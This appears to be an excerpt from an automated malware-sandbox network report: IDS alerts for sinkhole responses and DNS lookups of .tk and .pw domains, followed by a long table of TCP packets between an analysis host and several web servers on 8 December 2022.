167.99.35.88192.168.2.480497142016803 12/08/22-20:23:05.566997	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49714	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497172016803 12/08/22-20:23:06.970012	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49717	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497182016803 12/08/22-20:23:07.040295	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49718	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497112016803 12/08/22-20:23:01.014174	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49711	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480496962016803 12/08/22-20:22:40.566513	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49696	167.99.35.88	192.168.2.4
192.168.2.48.8.8.858128532016778 12/08/22-20:23:38.414344	UDP	2016778	ET DNS Query to a *.pw domain - Likely Hostile	58128	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.857430532016778 12/08/22-20:23:50.630568	UDP	2016778	ET DNS Query to a *.pw domain - Likely Hostile	57430	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.850836532012811 12/08/22-20:23:32.848684	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	50836	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497512016803 12/08/22-20:23:51.916223	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49751	167.99.35.88	192.168.2.4
192.168.2.48.8.8.853790532012811 12/08/22-20:24:08.175497	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	53790	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497602016803 12/08/22-20:24:07.971747	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49760	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497622016803 12/08/22-20:24:10.656758	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49762	167.99.35.88	192.168.2.4
192.168.2.48.8.8.861460532012811 12/08/22-20:23:01.398654	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	61460	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497482016803 12/08/22-20:23:41.280184	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49748	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497292016803 12/08/22-20:23:20.165240	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49729	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497452016803 12/08/22-20:23:39.766236	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49745	167.99.35.88	192.168.2.4
192.168.2.48.8.8.861579532016778 12/08/22-20:23:38.443764	UDP	2016778	ET DNS Query to a *.pw domain - Likely Hostile	61579	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497422016803 12/08/22-20:23:34.311501	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49742	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497472016803 12/08/22-20:23:41.215053	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49747	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497242016803 12/08/22-20:23:12.742181	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49724	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497082016803 12/08/22-20:23:00.337340	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49708	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497062016803 12/08/22-20:22:59.657038	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49706	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497262016803 12/08/22-20:23:16.216936	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49726	167.99.35.88	192.168.2.4
192.168.2.48.8.8.863001532012811 12/08/22-20:23:02.044069	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	63001	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497232016803 12/08/22-20:23:12.677852	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49723	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497272016803 12/08/22-20:23:16.282865	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49727	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497202016803 12/08/22-20:23:10.238692	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49720	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497212016803 12/08/22-20:23:10.319155	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49721	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497022016803 12/08/22-20:22:58.664946	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49702	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497032016803 12/08/22-20:22:58.726634	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49703	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497052016803 12/08/22-20:22:59.544698	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49705	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497092016803 12/08/22-20:23:00.402533	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49709	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497002016803 12/08/22-20:22:57.985784	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49700	167.99.35.88	192.168.2.4
192.168.2.48.8.8.854652532016778 12/08/22-20:23:50.665042	UDP	2016778	ET DNS Query to a *.pw domain - Likely Hostile	54652	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480496972016803 12/08/22-20:22:40.675539	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49697	167.99.35.88	192.168.2.4
192.168.2.48.8.8.860602532012811 12/08/22-20:23:30.604071	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	60602	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.860649532012811 12/08/22-20:23:33.187785	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	60649	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.858670532012811 12/08/22-20:23:52.939717	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	58670	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497302016803 12/08/22-20:23:20.231725	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49730	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497412016803 12/08/22-20:23:34.242393	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49741	167.99.35.88	192.168.2.4
192.168.2.48.8.8.853828532012811 12/08/22-20:24:08.518284	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	53828	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.852733532016778 12/08/22-20:23:35.381544	UDP	2016778	ET DNS Query to a *.pw domain - Likely Hostile	52733	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497502016803 12/08/22-20:23:51.851922	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49750	167.99.35.88	192.168.2.4
192.168.2.48.8.8.858894532016778 12/08/22-20:24:01.234435	UDP	2016778	ET DNS Query to a *.pw domain - Likely Hostile	58894	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497632016803 12/08/22-20:24:10.721330	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49763	167.99.35.88	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 8, 2022 20:22:40.350388050 CET	49695	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:40.371742010 CET	80	49695	88.198.29.97	192.168.2.4
Dec 8, 2022 20:22:40.371886969 CET	49695	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:40.373915911 CET	49695	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:40.395287037 CET	80	49695	88.198.29.97	192.168.2.4
Dec 8, 2022 20:22:40.395438910 CET	49695	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:40.507997990 CET	49696	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:40.537507057 CET	80	49696	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:40.537651062 CET	49696	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:40.537974119 CET	49696	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:40.566467047 CET	80	49696	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:40.566513062 CET	80	49696	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:40.566545010 CET	80	49696	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:40.566762924 CET	49696	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:40.567123890 CET	49696	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:40.616538048 CET	49697	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:40.645822048 CET	80	49697	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:40.645955086 CET	49697	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:40.646450043 CET	49697	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:40.675492048 CET	80	49697	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:40.675539017 CET	80	49697	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:40.675689936 CET	49697	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.646250010 CET	49698	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:57.668088913 CET	80	49698	88.198.29.97	192.168.2.4
Dec 8, 2022 20:22:57.668183088 CET	49698	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:57.668438911 CET	49698	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:57.690115929 CET	80	49698	88.198.29.97	192.168.2.4
Dec 8, 2022 20:22:57.690201044 CET	49698	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:57.862473965 CET	49699	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.891849995 CET	80	49699	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:57.891979933 CET	49699	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.892271996 CET	49699	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.921468973 CET	80	49699	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:57.921530962 CET	80	49699	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:57.921577930 CET	80	49699	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:57.921659946 CET	49699	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.921868086 CET	49699	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.926294088 CET	49697	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.927663088 CET	49700	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.955457926 CET	80	49697	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:57.955530882 CET	49697	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.956043005 CET	80	49700	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:57.956139088 CET	49700	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.957242966 CET	49700	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:57.985749006 CET	80	49700	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:57.985784054 CET	80	49700	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:57.986048937 CET	49700	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.256455898 CET	49701	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:22:58.422830105 CET	80	49701	64.70.19.203	192.168.2.4
Dec 8, 2022 20:22:58.425549030 CET	49701	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:22:58.425717115 CET	49701	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:22:58.591958046 CET	80	49701	64.70.19.203	192.168.2.4
Dec 8, 2022 20:22:58.592066050 CET	49701	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:22:58.594860077 CET	49702	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.625035048 CET	80	49702	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:58.625298977 CET	49702	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.632793903 CET	49702	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.664892912 CET	80	49702	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:58.664946079 CET	80	49702	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:58.664979935 CET	80	49702	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:58.665153980 CET	49702	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.665484905 CET	49702	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.666439056 CET	49700	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.667665958 CET	49703	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.695166111 CET	80	49700	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:58.695386887 CET	49700	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.696191072 CET	80	49703	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:58.696358919 CET	49703	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.697340965 CET	49703	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:58.726577044 CET	80	49703	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:58.726634026 CET	80	49703	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:58.726829052 CET	49703	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.315502882 CET	49704	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:59.337112904 CET	80	49704	88.198.29.97	192.168.2.4
Dec 8, 2022 20:22:59.339063883 CET	49704	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:59.339587927 CET	49704	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:59.364561081 CET	80	49704	88.198.29.97	192.168.2.4
Dec 8, 2022 20:22:59.365068913 CET	49704	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:22:59.488418102 CET	49705	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.511847973 CET	80	49705	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:59.515675068 CET	49705	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.521182060 CET	49705	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.544620991 CET	80	49705	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:59.544698000 CET	80	49705	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:59.544751883 CET	80	49705	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:59.544905901 CET	49705	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.545182943 CET	49705	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.587688923 CET	49703	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.589318991 CET	49706	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.616496086 CET	80	49703	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:59.616651058 CET	49703	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.618261099 CET	80	49706	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:59.618458986 CET	49706	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.627957106 CET	49706	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.656959057 CET	80	49706	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:59.657037973 CET	80	49706	167.99.35.88	192.168.2.4
Dec 8, 2022 20:22:59.657211065 CET	49706	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:22:59.920705080 CET	49707	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:00.086102962 CET	80	49707	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:00.086369038 CET	49707	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:00.086642981 CET	49707	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:00.251914978 CET	80	49707	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:00.252116919 CET	49707	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:00.290436029 CET	49708	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.313703060 CET	80	49708	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:00.313823938 CET	49708	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.314223051 CET	49708	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.337301970 CET	80	49708	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:00.337340117 CET	80	49708	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:00.337357044 CET	80	49708	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:00.337507010 CET	49708	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.350800991 CET	49708	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.351970911 CET	49706	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.354459047 CET	49709	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.377971888 CET	80	49709	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:00.378537893 CET	49709	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.379036903 CET	49709	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.381750107 CET	80	49706	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:00.381882906 CET	49706	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.402491093 CET	80	49709	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:00.402533054 CET	80	49709	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:00.402700901 CET	49709	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.694921017 CET	49710	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:00.861290932 CET	80	49710	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:00.861466885 CET	49710	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:00.861711025 CET	49710	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:00.955032110 CET	49711	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.984399080 CET	80	49711	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:00.984570026 CET	49711	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:00.984899998 CET	49711	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:01.014134884 CET	80	49711	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:01.014173985 CET	80	49711	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:01.014189959 CET	80	49711	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:01.014380932 CET	49711	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:01.014779091 CET	49711	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:01.018815041 CET	49709	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:01.020951986 CET	49712	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:01.027004004 CET	80	49710	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:01.027091026 CET	49710	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:01.042669058 CET	80	49709	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:01.042793036 CET	49709	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:01.050956964 CET	80	49712	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:01.051183939 CET	49712	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:01.054065943 CET	49712	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:01.083976984 CET	80	49712	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:01.084048986 CET	80	49712	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:01.084147930 CET	49712	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:03.364866972 CET	49713	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:03.386038065 CET	80	49713	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:03.386248112 CET	49713	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:03.508732080 CET	49713	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:03.529913902 CET	80	49713	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:03.530047894 CET	49713	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:05.239975929 CET	49714	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:05.269232988 CET	80	49714	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:05.270318031 CET	49714	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:05.537735939 CET	49714	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:05.566948891 CET	80	49714	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:05.566997051 CET	80	49714	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:05.567023039 CET	80	49714	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:05.567513943 CET	49714	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:05.929856062 CET	49714	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.120327950 CET	49712	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.121714115 CET	49715	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.150525093 CET	80	49712	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:06.150660038 CET	80	49715	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:06.150661945 CET	49712	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.150789976 CET	49715	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.202545881 CET	49715	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.231890917 CET	80	49715	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:06.231949091 CET	80	49715	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:06.232049942 CET	49715	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.843122959 CET	49716	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:06.864248991 CET	80	49716	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:06.864531994 CET	49716	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:06.873012066 CET	49716	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:06.894243956 CET	80	49716	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:06.894386053 CET	49716	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:06.906537056 CET	49717	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.939924002 CET	80	49717	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:06.940141916 CET	49717	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.940511942 CET	49717	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.969971895 CET	80	49717	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:06.970011950 CET	80	49717	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:06.970036983 CET	80	49717	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:06.970194101 CET	49717	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.986900091 CET	49717	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.987801075 CET	49715	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:06.989031076 CET	49718	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:07.012747049 CET	80	49718	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:07.012878895 CET	49718	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:07.016413927 CET	49718	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:07.017359972 CET	80	49715	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:07.017440081 CET	49715	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:07.040254116 CET	80	49718	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:07.040294886 CET	80	49718	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:07.040417910 CET	49718	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:09.939228058 CET	49719	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:10.104584932 CET	80	49719	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:10.104831934 CET	49719	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:10.105123043 CET	49719	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:10.176992893 CET	49720	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.206270933 CET	80	49720	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:10.206533909 CET	49720	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.206880093 CET	49720	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.238662004 CET	80	49720	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:10.238692045 CET	80	49720	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:10.238713026 CET	80	49720	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:10.238922119 CET	49720	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.239104986 CET	49720	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.242400885 CET	49718	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.256242037 CET	49721	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.266165018 CET	80	49718	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:10.266283035 CET	49718	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.270256996 CET	80	49719	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:10.270353079 CET	49719	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:10.285969019 CET	80	49721	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:10.286194086 CET	49721	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.290025949 CET	49721	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:10.319078922 CET	80	49721	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:10.319154978 CET	80	49721	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:10.319211960 CET	49721	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.403443098 CET	49722	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:12.426026106 CET	80	49722	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:12.426222086 CET	49722	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:12.426995993 CET	49722	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:12.448271990 CET	80	49722	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:12.448427916 CET	49722	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:12.618496895 CET	49723	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.647322893 CET	80	49723	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:12.648917913 CET	49723	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.649324894 CET	49723	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.677798986 CET	80	49723	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:12.677851915 CET	80	49723	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:12.677871943 CET	80	49723	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:12.678061008 CET	49723	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.678190947 CET	49723	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.680679083 CET	49721	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.682548046 CET	49724	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.709793091 CET	80	49721	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:12.709908962 CET	49721	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.711901903 CET	80	49724	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:12.712064981 CET	49724	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.712765932 CET	49724	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:12.742127895 CET	80	49724	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:12.742181063 CET	80	49724	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:12.742389917 CET	49724	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.034249067 CET	49725	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:16.056049109 CET	80	49725	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:16.056169987 CET	49725	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:16.056355000 CET	49725	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:16.078172922 CET	80	49725	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:16.078289986 CET	49725	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:16.159362078 CET	49726	80	192.168.2.4	167.99.35.88
